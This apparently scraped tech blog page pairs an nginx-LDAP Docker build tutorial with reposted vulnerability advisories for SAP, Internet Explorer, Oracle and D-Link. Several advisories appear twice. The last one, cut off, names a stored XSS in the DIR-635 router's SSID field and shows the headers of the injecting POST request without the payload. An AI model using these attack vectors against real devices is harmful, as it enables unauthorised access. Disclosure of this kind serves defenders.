Nginx, by default doesn't come with LDAP integration. There is an addon script though that enables it to integrate with LDAP called nginx-auth-ldap.
I've recently been tasked to come up with an implementation of this using docker virtualization technology and just wanted to share this so other won't have to go through the same process I did when I was testing this out.
Dockerfile content below:
# Nginx-Auth-LDAP Dockerfile
FROM ubuntu:latest
RUN apt-get update
RUN apt-get install -y wget build-essential libldap2-dev libssl-dev zlib1g-dev libpcre3 libpcre3-dev git libc6 libexpat1 libgd2-xpm-dev libgeoip1 libgeoip-dev libpam0g libssl1.0.0 libxml2 libxslt1.1 libxslt-dev zlib1g perl openssl
RUN cd /root && wget http://nginx.org/download/nginx-1.6.0.tar.gz && tar xvzf nginx-1.6.0.tar.gz
RUN cd /root/nginx-1.6.0 && git clone https://github.com/kvspb/nginx-auth-ldap.git
RUN mkdir -p /opt/nginx
ADD config /root/nginx-1.6.0/nginx-auth-ldap/config
RUN cd /root/nginx-1.6.0 && ./configure --prefix=/opt/nginx --user=www-data --group=www-data --with-http_ssl_module --with-http_realip_module --with-http_addition_module --with-http_sub_module --with-http_dav_module --with-http_gzip_static_module --with-http_stub_status_module --add-module=nginx-auth-ldap && make && make install
ADD nginx /etc/init.d/nginx
RUN chmod +x /etc/init.d/nginx
ADD nginx.conf /opt/nginx/conf/nginx.conf
VOLUME ["/data", "/opt/nginx/sites-enabled", "/opt/nginx/log"]
EXPOSE 8000
WORKDIR /opt/nginx
CMD ["/etc/init.d/nginx", "start"]
config file content:
ngx_addon_name=ngx_http_auth_ldap_module
HTTP_MODULES="$HTTP_MODULES ngx_http_auth_ldap_module"
NGX_ADDON_SRCS="$NGX_ADDON_SRCS $ngx_addon_dir/ngx_http_auth_ldap_module.c"
CORE_LIBS="$CORE_LIBS -lldap -llber"
case "$NGX_PLATFORM" in
SunOS:*)
CORE_LIBS="$CORE_LIBS -llber"
;;
esac
CFLAGS="$CFLAGS"
CFLAGS="$CFLAGS"
nginx.conf file content:
worker_processes 1;
events {
worker_connections 1024;
}
http {
ldap_server test1 {
url ldap://ldapurl/DC=maindc,DC=com?sAMAccountName?sub?(objectClass=person);
binddn "cn=root";
binddn_passwd password;
group_attribute uniquemember;
group_attribute_is_dn on;
require valid_user;
}
server {
listen 8000;
server_name localhost;
auth_ldap "Forbidden";
auth_ldap_servers test1;
location / {
root html;
index index.html index.htm;
}
}
}
nginx file content:
#! /bin/sh
### BEGIN INIT INFO
* Provides: nginx
* Required-Start: $all
* Required-Stop: $all
* Default-Start: 2 3 4 5
* Default-Stop: 0 1 6
* Short-Description: starts the nginx web server
* Description: starts nginx using start-stop-daemon
### END INIT INFO
PATH=/opt/nginx/sbin:/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
DAEMON=/opt/nginx/sbin/nginx
NAME=nginx
DESC=nginx
test -x $DAEMON || exit 0
* Include nginx defaults if available
if [ -f /etc/default/nginx ] ; then
. /etc/default/nginx
fi
set -e
case "$1" in
start)
echo -n "Starting $DESC: "
start-stop-daemon --start --quiet --pidfile /var/run/$NAME.pid \
--exec $DAEMON -- $DAEMON_OPTS
echo "$NAME."
;;
stop)
echo -n "Stopping $DESC: "
start-stop-daemon --stop --quiet --pidfile /var/run/$NAME.pid \
--exec $DAEMON
echo "$NAME."
;;
restart|force-reload)
echo -n "Restarting $DESC: "
start-stop-daemon --stop --quiet --pidfile \
/var/run/$NAME.pid --exec $DAEMON
sleep 1
start-stop-daemon --start --quiet --pidfile \
/var/run/$NAME.pid --exec $DAEMON -- $DAEMON_OPTS
echo "$NAME."
;;
reload)
echo -n "Reloading $DESC configuration: "
start-stop-daemon --stop --signal HUP --quiet --pidfile /var/run/$NAME.pid \
--exec $DAEMON
echo "$NAME."
;;
*)
N=/etc/init.d/$NAME
echo "Usage: $N {start|stop|restart|reload|force-reload}" >&2
exit 1
;;
esac
exit 0
Monday, September 8, 2014
Thursday, September 4, 2014
Tuesday, August 5, 2014
SAP HANA XS Missing encryption in form-based authentication
Onapsis Security Advisory 2014-021: SAP HANA XS Missing encryption in
form-based authentication
This advisory can be downloaded in PDF format from
http://www.onapsis.com/.
1. Impact on Business
SAP HANA XS does not enforce any encryption in the form based
authentication. It
could allow an anonymous user to get information such as valid
credentials from
network traffic, gaining access into the system.
Risk Level: Low
2. Advisory Information
- Public Release Date: 2014-07-29
- Subscriber Notification Date: 2014-07-29
- Last Revised: 2014-07-25
- Security Advisory ID: ONAPSIS-2014-021
- Onapsis SVS ID: ONAPSIS-0094
- Researcher: Sergio Abraham, Manuel Muradas
- Initial Base CVSS v2: 2.9 (AV:A/AC:M/AU:N/C:P/I:N/A:N)
3. Vulnerability Information
- Vendor: SAP
- Affected Components:
- SAP HANA Extended Application Services (Check SAP Note 1963932 for
detailed information on affected releases)
- Vulnerability Class: Cleartext Transmission of Sensitive Information
(CWE-319)
- Remotely Exploitable: Yes
- Locally Exploitable: No
- Authentication Required: No
- Detection Module available in Onapsis X1: Yes
- Original Advisory:
http://www.onapsis.com/resources/get.php?resid=adv_onapsis-2014-021
4. Affected Components Description
SAP HANA Extended Application Services (XS) is an application server,
web server and development environment for web applications within the SAP HANA System.
SAP HANA XS is fully integrated with the SAP HANA Database.
5. Vulnerability Details
SAP HANA Extend Application Services (XS) based applications can be set to be ?form based
authentication? access using SSL. When this configuration is set, the authentication
mechanism does not properly enforce the required level of encryption.
Technical details about this issue are not disclosed at this moment with
the purpose of providing enough time to affected customers to patch their systems and
protect against the exploitation of the described vulnerability.
6. Solution
SAP has released SAP Note 1963932 which provides patched versions of the
affected components.
The patches can be downloaded from
https://service.sap.com/sap/support/notes/1963932.
Onapsis strongly recommends SAP customers to download the related security fixes and
apply them to the affected components in order to reduce business risks.
form-based authentication
This advisory can be downloaded in PDF format from
http://www.onapsis.com/.
1. Impact on Business
SAP HANA XS does not enforce any encryption in the form based
authentication. It
could allow an anonymous user to get information such as valid
credentials from
network traffic, gaining access into the system.
Risk Level: Low
2. Advisory Information
- Public Release Date: 2014-07-29
- Subscriber Notification Date: 2014-07-29
- Last Revised: 2014-07-25
- Security Advisory ID: ONAPSIS-2014-021
- Onapsis SVS ID: ONAPSIS-0094
- Researcher: Sergio Abraham, Manuel Muradas
- Initial Base CVSS v2: 2.9 (AV:A/AC:M/AU:N/C:P/I:N/A:N)
3. Vulnerability Information
- Vendor: SAP
- Affected Components:
- SAP HANA Extended Application Services (Check SAP Note 1963932 for
detailed information on affected releases)
- Vulnerability Class: Cleartext Transmission of Sensitive Information
(CWE-319)
- Remotely Exploitable: Yes
- Locally Exploitable: No
- Authentication Required: No
- Detection Module available in Onapsis X1: Yes
- Original Advisory:
http://www.onapsis.com/resources/get.php?resid=adv_onapsis-2014-021
4. Affected Components Description
SAP HANA Extended Application Services (XS) is an application server,
web server and development environment for web applications within the SAP HANA System.
SAP HANA XS is fully integrated with the SAP HANA Database.
5. Vulnerability Details
SAP HANA Extend Application Services (XS) based applications can be set to be ?form based
authentication? access using SSL. When this configuration is set, the authentication
mechanism does not properly enforce the required level of encryption.
Technical details about this issue are not disclosed at this moment with
the purpose of providing enough time to affected customers to patch their systems and
protect against the exploitation of the described vulnerability.
6. Solution
SAP has released SAP Note 1963932 which provides patched versions of the
affected components.
The patches can be downloaded from
https://service.sap.com/sap/support/notes/1963932.
Onapsis strongly recommends SAP customers to download the related security fixes and
apply them to the affected components in order to reduce business risks.
Tuesday, July 29, 2014
Multiple Hard-coded Usernames in SAP components
Onapsis Security Advisories: Multiple Hard-coded Usernames (CWE-798) have
been found and patched in a variety of SAP components.
Summaries of the advisories with links to full versions follow:
1. ONAPSIS-2014-011-SAP Project System Structures and Project-Oriented
Procurement Hard-coded credentials
=======================================================================
-- Public Release Date: 2014-06-06
-- Researcher: Sergio Abraham
-- Initial Base CVSS v2: 6.0 (AV:N/AC:M/AU:S/C:P/I:P/A:P)
-- Affected Components:
* Project System
* Structures
* Project-Oriented Procurement
(Check SAP Note 1791081 for detailed information on affected releases)
-- Original Advisory:
http://www.onapsis.com/resources/get.php?resid=adv_onapsis-2014-011
2. ONAPSIS-2014-012-SAP Brazil Specific Add-On Hard-coded Credentials
=====================================================================
-- Public Release Date: 2014-06-06
-- Researcher: Sergio Abraham
-- Initial Base CVSS v2: 4.0 (AV:N/AC:L/AU:S/C:P/I:N/A:N)
-- Fix in SAP Note:1768049
-- Affected Components:
* Brazil Specific Add-On
-- Original Advisory:
http://www.onapsis.com/resources/get.php?resid=adv_onapsis-2014-012
3. ONAPSIS-2014-013-SAP OIL Industry Solution Traders and Schedulers
Workbench Hard-coded Credentials
=====================================================================
-- Public Release Date: 2014-06-06
-- Researcher: Sergio Abraham
-- Initial Base CVSS v2: 4.6 (AV:N/AC:H/AU:S/C:P/I:P/A:P)
-- Fix in SAP Note: 1920323
-- Affected Components:
* SAP Oil Industry Solution Traders and Schedulers Workbench
-- Original Advisory:
http://www.onapsis.com/resources/get.php?resid=adv_onapsis-2014-013
4. ONAPSIS-2014-014-SAP Upgrade tools for ABAP Hard-coded credentials
=====================================================================
-- Public Release Date: 2014-06-06
-- Researcher: Sergio Abraham
-- Initial Base CVSS v2: 4.9 (AV:N/AC:M/AU:S/C:N/I:P/A:P)
-- Fix in SAP Note: 1915873
-- Affected Components:
* SAP Upgrade Tools
-- Original Advisory:
http://www.onapsis.com/resources/get.php?resid=adv_onapsis-2014-014
5. ONAPSIS-2014-015-SAP Web Services Tool Hard-coded Credentials
================================================================
-- Public Release Date: 2014-06-06
-- Researcher: Sergio Abraham
-- Initial Base CVSS v2: 3.5 (AV:N/AC:M/AU:S/C:P/I:N/A:N)
-- Fix in SAP Note: 1914777
-- Affected Components:
* SAP Web Services Tool
-- Original Advisory:
http://www.onapsis.com/resources/get.php?resid=adv_onapsis-2014-015
6. ONAPSIS-2014-016-SAP CCMS Monitoring Hard-coded Credentials
==============================================================
-- Public Release Date: 2014-06-06
-- Researcher: Sergio Abraham
-- Initial Base CVSS v2: 6.0 (AV:N/AC:M/AU:S/C:P/I:P/A:P)
-- Fix in SAP Note: 1911174
-- Affected Components:
* SAP CCMS Monitoring
-- Original Advisory:
http://www.onapsis.com/resources/get.php?resid=adv_onapsis-2014-016
7. ONAPSIS-2014-017-SAP Transaction Data Pool Hard-coded Credentials
====================================================================
-- Public Release Date: 2014-06-06
-- Researcher: Sergio Abraham
-- Initial Base CVSS v2: 6.0 (AV:N/AC:M/AU:S/C:P/I:P/A:P)
-- Fix in SAP Note: 1795463
-- Affected Components:
* SAP Transaction Data Pool
-- Original Advisory:
http://www.onapsis.com/resources/get.php?resid=adv_onapsis-2014-017
8. ONAPSIS-2014-018-SAP Capacity Leveling Hard-coded Credentials
================================================================
-- Public Release Date: 2014-06-06
-- Researcher: Sergio Abraham
-- Initial Base CVSS v2: 6.0 (AV:N/AC:M/AU:S/C:P/I:P/A:P)
-- Fix in SAP Note: 1789569
-- Affected Components:
* SAP Capacity Leveling
-- Original Advisory:
http://www.onapsis.com/resources/get.php?resid=adv_onapsis-2014-018
9. ONAPSIS-2014-019-SAP Open Hub Service Hard-coded Credentials
===============================================================
-- Public Release Date: 2014-06-06
-- Researcher: Sergio Abraham
-- Initial Base CVSS v2: 4.9 (AV:N/AC:M/AU:S/C:P/I:P/A:N)
-- Fix in SAP Note: 1738965
-- Affected Components:
* SAP Open Hub Service
-- Original Advisory:
http://www.onapsis.com/resources/get.php?resid=adv_onapsis-2014-019
been found and patched in a variety of SAP components.
Summaries of the advisories with links to full versions follow:
1. ONAPSIS-2014-011-SAP Project System Structures and Project-Oriented
Procurement Hard-coded credentials
=======================================================================
-- Public Release Date: 2014-06-06
-- Researcher: Sergio Abraham
-- Initial Base CVSS v2: 6.0 (AV:N/AC:M/AU:S/C:P/I:P/A:P)
-- Affected Components:
* Project System
* Structures
* Project-Oriented Procurement
(Check SAP Note 1791081 for detailed information on affected releases)
-- Original Advisory:
http://www.onapsis.com/resources/get.php?resid=adv_onapsis-2014-011
2. ONAPSIS-2014-012-SAP Brazil Specific Add-On Hard-coded Credentials
=====================================================================
-- Public Release Date: 2014-06-06
-- Researcher: Sergio Abraham
-- Initial Base CVSS v2: 4.0 (AV:N/AC:L/AU:S/C:P/I:N/A:N)
-- Fix in SAP Note:1768049
-- Affected Components:
* Brazil Specific Add-On
-- Original Advisory:
http://www.onapsis.com/resources/get.php?resid=adv_onapsis-2014-012
3. ONAPSIS-2014-013-SAP OIL Industry Solution Traders and Schedulers
Workbench Hard-coded Credentials
=====================================================================
-- Public Release Date: 2014-06-06
-- Researcher: Sergio Abraham
-- Initial Base CVSS v2: 4.6 (AV:N/AC:H/AU:S/C:P/I:P/A:P)
-- Fix in SAP Note: 1920323
-- Affected Components:
* SAP Oil Industry Solution Traders and Schedulers Workbench
-- Original Advisory:
http://www.onapsis.com/resources/get.php?resid=adv_onapsis-2014-013
4. ONAPSIS-2014-014-SAP Upgrade tools for ABAP Hard-coded credentials
=====================================================================
-- Public Release Date: 2014-06-06
-- Researcher: Sergio Abraham
-- Initial Base CVSS v2: 4.9 (AV:N/AC:M/AU:S/C:N/I:P/A:P)
-- Fix in SAP Note: 1915873
-- Affected Components:
* SAP Upgrade Tools
-- Original Advisory:
http://www.onapsis.com/resources/get.php?resid=adv_onapsis-2014-014
5. ONAPSIS-2014-015-SAP Web Services Tool Hard-coded Credentials
================================================================
-- Public Release Date: 2014-06-06
-- Researcher: Sergio Abraham
-- Initial Base CVSS v2: 3.5 (AV:N/AC:M/AU:S/C:P/I:N/A:N)
-- Fix in SAP Note: 1914777
-- Affected Components:
* SAP Web Services Tool
-- Original Advisory:
http://www.onapsis.com/resources/get.php?resid=adv_onapsis-2014-015
6. ONAPSIS-2014-016-SAP CCMS Monitoring Hard-coded Credentials
==============================================================
-- Public Release Date: 2014-06-06
-- Researcher: Sergio Abraham
-- Initial Base CVSS v2: 6.0 (AV:N/AC:M/AU:S/C:P/I:P/A:P)
-- Fix in SAP Note: 1911174
-- Affected Components:
* SAP CCMS Monitoring
-- Original Advisory:
http://www.onapsis.com/resources/get.php?resid=adv_onapsis-2014-016
7. ONAPSIS-2014-017-SAP Transaction Data Pool Hard-coded Credentials
====================================================================
-- Public Release Date: 2014-06-06
-- Researcher: Sergio Abraham
-- Initial Base CVSS v2: 6.0 (AV:N/AC:M/AU:S/C:P/I:P/A:P)
-- Fix in SAP Note: 1795463
-- Affected Components:
* SAP Transaction Data Pool
-- Original Advisory:
http://www.onapsis.com/resources/get.php?resid=adv_onapsis-2014-017
8. ONAPSIS-2014-018-SAP Capacity Leveling Hard-coded Credentials
================================================================
-- Public Release Date: 2014-06-06
-- Researcher: Sergio Abraham
-- Initial Base CVSS v2: 6.0 (AV:N/AC:M/AU:S/C:P/I:P/A:P)
-- Fix in SAP Note: 1789569
-- Affected Components:
* SAP Capacity Leveling
-- Original Advisory:
http://www.onapsis.com/resources/get.php?resid=adv_onapsis-2014-018
9. ONAPSIS-2014-019-SAP Open Hub Service Hard-coded Credentials
===============================================================
-- Public Release Date: 2014-06-06
-- Researcher: Sergio Abraham
-- Initial Base CVSS v2: 4.9 (AV:N/AC:M/AU:S/C:P/I:P/A:N)
-- Fix in SAP Note: 1738965
-- Affected Components:
* SAP Open Hub Service
-- Original Advisory:
http://www.onapsis.com/resources/get.php?resid=adv_onapsis-2014-019
SAP SLD Information Tampering
Onapsis Security Advisory 2014-020: SAP SLD Information Tampering
1. Impact on Business
=====================
By exploiting this vulnerability, a remote unauthenticated attacker
might be able to
modify technical information about the SAP systems potentially leading
to a full compromise of all business information.
Risk Level: High
2. Advisory Information
=======================
-- Public Release Date: 2014-06-06
-- Subscriber Notification Date: 2014-06-06
-- Last Revised: 2014-06-06
-- Security Advisory ID: ONAPSIS-2014-020
-- Onapsis SVS ID: ONAPSIS-SVS00081
-- Researchers: Jordan Santarsieri, Pablo Muller, Juan Perez-Etchegoyen
-- Initial Base CVSS v2: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
3. Vulnerability Information
============================
-- Vendor: SAP
-- Affected Components:
* SAP System Landscape Directory (available in all SAP JAVA App Servers)
(Check SAP Note 1939334 for detailed information on affected releases)
-- Vulnerability Class: Improper Handling of Insufficient Permissions
or Privileges (CWE-280)
-- Remotely Exploitable: Yes
-- Locally Exploitable: No
-- Authentication Required: No
-- Original Advisory:
http://www.onapsis.com/resources/get.php?resid=adv_onapsis-2014-020
4. Affected Components Description
==================================
According to the vendor, ?The System Landscape Directory (SLD) of SAP
NetWeaver is the central
source of system landscape information relevant for the management of
your software life-cycle?[1].
5. Vulnerability Details
========================
The SLD is a central repository of technical and SAP systems-related
information. The mechanism
used to add new systems to the SLD is not properly secured by default,
meaning that a remote
unauthenticated attacker could interact with the SLD and because of its
architectural design,
it could lead to a full SAP SLD system compromise.
Technical details about this issue are not disclosed at this moment with
the purpose of
providing enough time to affected customers to patch their systems and
protect against
the exploitation of the described vulnerability.
6. Solution
===========
SAP has released SAP Note 1939334 which provide patched versions of the
affected components.
The patches can be downloaded from
https://service.sap.com/sap/support/notes/1939334.
Onapsis strongly recommends SAP customers to download the related
security fixes and apply them to the affected
components in order to reduce business risks.
1. Impact on Business
=====================
By exploiting this vulnerability, a remote unauthenticated attacker
might be able to
modify technical information about the SAP systems potentially leading
to a full compromise of all business information.
Risk Level: High
2. Advisory Information
=======================
-- Public Release Date: 2014-06-06
-- Subscriber Notification Date: 2014-06-06
-- Last Revised: 2014-06-06
-- Security Advisory ID: ONAPSIS-2014-020
-- Onapsis SVS ID: ONAPSIS-SVS00081
-- Researchers: Jordan Santarsieri, Pablo Muller, Juan Perez-Etchegoyen
-- Initial Base CVSS v2: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
3. Vulnerability Information
============================
-- Vendor: SAP
-- Affected Components:
* SAP System Landscape Directory (available in all SAP JAVA App Servers)
(Check SAP Note 1939334 for detailed information on affected releases)
-- Vulnerability Class: Improper Handling of Insufficient Permissions
or Privileges (CWE-280)
-- Remotely Exploitable: Yes
-- Locally Exploitable: No
-- Authentication Required: No
-- Original Advisory:
http://www.onapsis.com/resources/get.php?resid=adv_onapsis-2014-020
4. Affected Components Description
==================================
According to the vendor, ?The System Landscape Directory (SLD) of SAP
NetWeaver is the central
source of system landscape information relevant for the management of
your software life-cycle?[1].
5. Vulnerability Details
========================
The SLD is a central repository of technical and SAP systems-related
information. The mechanism
used to add new systems to the SLD is not properly secured by default,
meaning that a remote
unauthenticated attacker could interact with the SLD and because of its
architectural design,
it could lead to a full SAP SLD system compromise.
Technical details about this issue are not disclosed at this moment with
the purpose of
providing enough time to affected customers to patch their systems and
protect against
the exploitation of the described vulnerability.
6. Solution
===========
SAP has released SAP Note 1939334 which provide patched versions of the
affected components.
The patches can be downloaded from
https://service.sap.com/sap/support/notes/1939334.
Onapsis strongly recommends SAP customers to download the related
security fixes and apply them to the affected
components in order to reduce business risks.
Thursday, January 9, 2014
Hack in the Box Magazine
I'm an avid reader of eBooks and IT Security has taken my curiosity for quite a while now. There are a number of online forums and references available and a few sites that serve as testing ground for would-be IT Security enthusiasts. Right now though what caught my attention is a site that caters for a free version of their magazine HITB Magazine.
True to the idea of the Open Source community, this site offers this knowledge rich reference for free. So far, they have been able to release issues on a regular basis (I wonder though how long that will last). It's like an FHM for for hackers :) and I'd recommend it for people who want to get updated on the who's who and what's what of the IT Security world.
True to the idea of the Open Source community, this site offers this knowledge rich reference for free. So far, they have been able to release issues on a regular basis (I wonder though how long that will last). It's like an FHM for for hackers :) and I'd recommend it for people who want to get updated on the who's who and what's what of the IT Security world.
Tuesday, November 26, 2013
Connecting to Cisco WebexConnect using Jabber
It's been twice that I had to Google this thing so I'm putting it up on my blog for future reference. :)
Username: {site username}
Password: {obviously...}
Host: c2s.{your domain}.webexconnect.com
(note: if your domain is something like site.com, then include the .com here)
Port: 5222
Username: {site username}
Password: {obviously...}
Host: c2s.{your domain}.webexconnect.com
(note: if your domain is something like site.com, then include the .com here)
Port: 5222
Saturday, May 4, 2013
VUPEN Security Research - Microsoft Internet Explorer 10-9-8-7-6 "CDisplayPointer" Use-after-free (MS13-028)
VUPEN Security Research - Microsoft Internet Explorer 10-9-8-7-6
"CDisplayPointer" Use-after-free (MS13-028)
Website : http://www.vupen.com
Twitter : http://twitter.com/vupen
I. BACKGROUND
---------------------
"Microsoft Internet Explorer is a web browser developed by Microsoft and
included as part of the Microsoft Windows line of operating systems with
more than 60% of the worldwide usage share of web browsers." (Wikipedia)
II. DESCRIPTION
---------------------
VUPEN Vulnerability Research Team discovered a critical vulnerability
in Microsoft Internet Explorer.
The vulnerability is caused by a use-after-free error in the
"CDisplayPointer::
processing "CDisplayPointer" objects, which could be exploited by remote
attackers to compromise a vulnerable system via a malicious web page.
III. AFFECTED PRODUCTS
---------------------------
Microsoft Internet Explorer 10
Microsoft Internet Explorer 9
Microsoft Internet Explorer 8
Microsoft Internet Explorer 7
Microsoft Internet Explorer 6
Microsoft Windows RT
Microsoft Windows 8 for 32-bit Systems
Microsoft Windows 8 for x64-based Systems
Microsoft Windows Server 2012
Microsoft Windows 7 for 32-bit Systems
Microsoft Windows 7 for 32-bit Systems Service Pack 1
Microsoft Windows 7 for x64-based Systems
Microsoft Windows 7 for x64-based Systems Service Pack 1
Microsoft Windows Server 2008 for 32-bit Systems
Microsoft Windows Server 2008 for 32-bit Systems Service Pack 2
Microsoft Windows Server 2008 for x64-based Systems
Microsoft Windows Server 2008 for x64-based Systems Service Pack 2
Microsoft Windows Server 2008 for Itanium-based Systems
Microsoft Windows Server 2008 for Itanium-based Systems Service Pack 2
Microsoft Windows Server 2008 R2 for x64-based Systems
Microsoft Windows Server 2008 R2 for x64-based Systems Service Pack 1
Microsoft Windows Server 2008 R2 for Itanium-based Systems
Microsoft Windows Server 2008 R2 for Itanium-based Systems Service Pack 1
Microsoft Windows Vista Service Pack 1
Microsoft Windows Vista Service Pack 2
Microsoft Windows Vista x64 Edition Service Pack 1
Microsoft Windows Vista x64 Edition Service Pack 2
Microsoft Windows Server 2003 Service Pack 2
Microsoft Windows Server 2003 x64 Edition Service Pack 2
Microsoft Windows Server 2003 with SP2 for Itanium-based Systems
Microsoft Windows XP Service Pack 3
Microsoft Windows XP Professional x64 Edition Service Pack 2
IV. Binary Analysis & Exploits/PoCs
------------------------------
In-depth technical analysis of the vulnerability and a fully functional
remote code execution exploit are available through the VUPEN BAE
(Binary Analysis & Exploits) portal:
http://www.vupen.com/english/
VUPEN Binary Analysis & Exploits Service provides private exploits and
in-depth technical analysis of the most significant public vulnerabilities
based on disassembly, reverse engineering, protocol analysis, and code
audit.
The service allows governments and major corporations to evaluate risks, and
protect infrastructures and assets against new threats. The service also
allows security vendors (IPS, IDS, AntiVirus) to supplement their internal
research efforts and quickly develop both vulnerability-based and
exploit-based signatures to proactively protect their customers from attacks
and emerging threats.
V. VUPEN Threat Protection Program
------------------------------
Governments and major corporations which are members of the VUPEN Threat
Protection Program (TPP) have been proactively alerted about the
vulnerability
when it was discovered by VUPEN in advance of its public disclosure, and
have received a detailed attack detection guidance to protect national and
critical infrastructures against potential 0-day attacks exploiting this
vulnerability:
http://www.vupen.com/english/
VI. SOLUTION
----------------
Apply MS13-028 security updates.
VII. CREDIT
--------------
This vulnerability was discovered by Nicolas Joly of VUPEN Security
VIII. ABOUT VUPEN Security
---------------------------
VUPEN is the leading provider of defensive and offensive cybersecurity
intelligence and advanced vulnerability research. VUPEN solutions enable
corporations and governments to manage risks, and protect critical networks
and infrastructures against known and unknown vulnerabilities.
VUPEN solutions include:
* VUPEN Binary Analysis & Exploits Service (BAE) :
http://www.vupen.com/english/
* VUPEN Threat Protection Program (TPP) :
http://www.vupen.com/english/
IX. REFERENCES
----------------------
http://www.adobe.com/support/
http://www.vupen.com/english/
X. DISCLOSURE TIMELINE
-----------------------------
2012-04-05 - Vulnerability Discovered by VUPEN and shared with VUPEN TPP
customers
2013-04-09 - MS13-028 Released By Microsoft
2013-05-02 - Public disclosure
"CDisplayPointer" Use-after-free (MS13-028)
Website : http://www.vupen.com
Twitter : http://twitter.com/vupen
I. BACKGROUND
---------------------
"Microsoft Internet Explorer is a web browser developed by Microsoft and
included as part of the Microsoft Windows line of operating systems with
more than 60% of the worldwide usage share of web browsers." (Wikipedia)
II. DESCRIPTION
---------------------
VUPEN Vulnerability Research Team discovered a critical vulnerability
in Microsoft Internet Explorer.
The vulnerability is caused by a use-after-free error in the
"CDisplayPointer::
processing "CDisplayPointer" objects, which could be exploited by remote
attackers to compromise a vulnerable system via a malicious web page.
III. AFFECTED PRODUCTS
---------------------------
Microsoft Internet Explorer 10
Microsoft Internet Explorer 9
Microsoft Internet Explorer 8
Microsoft Internet Explorer 7
Microsoft Internet Explorer 6
Microsoft Windows RT
Microsoft Windows 8 for 32-bit Systems
Microsoft Windows 8 for x64-based Systems
Microsoft Windows Server 2012
Microsoft Windows 7 for 32-bit Systems
Microsoft Windows 7 for 32-bit Systems Service Pack 1
Microsoft Windows 7 for x64-based Systems
Microsoft Windows 7 for x64-based Systems Service Pack 1
Microsoft Windows Server 2008 for 32-bit Systems
Microsoft Windows Server 2008 for 32-bit Systems Service Pack 2
Microsoft Windows Server 2008 for x64-based Systems
Microsoft Windows Server 2008 for x64-based Systems Service Pack 2
Microsoft Windows Server 2008 for Itanium-based Systems
Microsoft Windows Server 2008 for Itanium-based Systems Service Pack 2
Microsoft Windows Server 2008 R2 for x64-based Systems
Microsoft Windows Server 2008 R2 for x64-based Systems Service Pack 1
Microsoft Windows Server 2008 R2 for Itanium-based Systems
Microsoft Windows Server 2008 R2 for Itanium-based Systems Service Pack 1
Microsoft Windows Vista Service Pack 1
Microsoft Windows Vista Service Pack 2
Microsoft Windows Vista x64 Edition Service Pack 1
Microsoft Windows Vista x64 Edition Service Pack 2
Microsoft Windows Server 2003 Service Pack 2
Microsoft Windows Server 2003 x64 Edition Service Pack 2
Microsoft Windows Server 2003 with SP2 for Itanium-based Systems
Microsoft Windows XP Service Pack 3
Microsoft Windows XP Professional x64 Edition Service Pack 2
IV. Binary Analysis & Exploits/PoCs
------------------------------
In-depth technical analysis of the vulnerability and a fully functional
remote code execution exploit are available through the VUPEN BAE
(Binary Analysis & Exploits) portal:
http://www.vupen.com/english/
VUPEN Binary Analysis & Exploits Service provides private exploits and
in-depth technical analysis of the most significant public vulnerabilities
based on disassembly, reverse engineering, protocol analysis, and code
audit.
The service allows governments and major corporations to evaluate risks, and
protect infrastructures and assets against new threats. The service also
allows security vendors (IPS, IDS, AntiVirus) to supplement their internal
research efforts and quickly develop both vulnerability-based and
exploit-based signatures to proactively protect their customers from attacks
and emerging threats.
V. VUPEN Threat Protection Program
------------------------------
Governments and major corporations which are members of the VUPEN Threat
Protection Program (TPP) have been proactively alerted about the
vulnerability
when it was discovered by VUPEN in advance of its public disclosure, and
have received a detailed attack detection guidance to protect national and
critical infrastructures against potential 0-day attacks exploiting this
vulnerability:
http://www.vupen.com/english/
VI. SOLUTION
----------------
Apply MS13-028 security updates.
VII. CREDIT
--------------
This vulnerability was discovered by Nicolas Joly of VUPEN Security
VIII. ABOUT VUPEN Security
---------------------------
VUPEN is the leading provider of defensive and offensive cybersecurity
intelligence and advanced vulnerability research. VUPEN solutions enable
corporations and governments to manage risks, and protect critical networks
and infrastructures against known and unknown vulnerabilities.
VUPEN solutions include:
* VUPEN Binary Analysis & Exploits Service (BAE) :
http://www.vupen.com/english/
* VUPEN Threat Protection Program (TPP) :
http://www.vupen.com/english/
IX. REFERENCES
----------------------
http://www.adobe.com/support/
http://www.vupen.com/english/
X. DISCLOSURE TIMELINE
-----------------------------
2012-04-05 - Vulnerability Discovered by VUPEN and shared with VUPEN TPP
customers
2013-04-09 - MS13-028 Released By Microsoft
2013-05-02 - Public disclosure
NGS00415 Patch Notification: Oracle 11g TNS listener remote Null Pointer Dereference (pre-auth)
High Risk Vulnerability in Oracle Database 11g
1 May 2013
Andy Davis of NCC Group has discovered a High risk vulnerability in Oracle Database 11g
Impact: Null Pointer Dereference (Remote DoS)
Versions affected: Oracle Database 11g
Security patch information can be found at the following URL:
http://www.oracle.com/
NCC Group is going to withhold details of this flaw for three months. This three month window will allow users the time needed to apply the patch before the details are released to the general public. This reflects the NCC Group approach to responsible disclosure.
NCC Group Research
http://www.nccgroup.com/
1 May 2013
Andy Davis of NCC Group has discovered a High risk vulnerability in Oracle Database 11g
Impact: Null Pointer Dereference (Remote DoS)
Versions affected: Oracle Database 11g
Security patch information can be found at the following URL:
http://www.oracle.com/
NCC Group is going to withhold details of this flaw for three months. This three month window will allow users the time needed to apply the patch before the details are released to the general public. This reflects the NCC Group approach to responsible disclosure.
NCC Group Research
http://www.nccgroup.com/
Sunday, April 28, 2013
Security Advisory : Multiple Vulnerabilities in D'Link DIR-635
============ Vulnerable Firmware Releases: ============
Firmwareversion: 2.34EU
Hardware-Version: B1
Produktseite: DIR-635
============ Vulnerability Overview: ============
* Stored XSS -> Status - WLAN -> SSID
Injecting scripts into the parameter config.wireless%5B0%5D.ssid_profiles%5B0%5D.ssid reveals that this parameter is not properly validated for malicious input. You need to be authenticated or you have to find other methods for inserting the malicious JavaScript code.
Place the Code via Setup -> Wireless -> Wireless Network Name
POST /Basic/Wireless.shtml HTTP/1.1
Host: 192.168.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Referer: http://192.168.0.1/Basic/Wireless.shtml
Content-Type: application/x-www-form-urlencoded
Content-Length: 2307
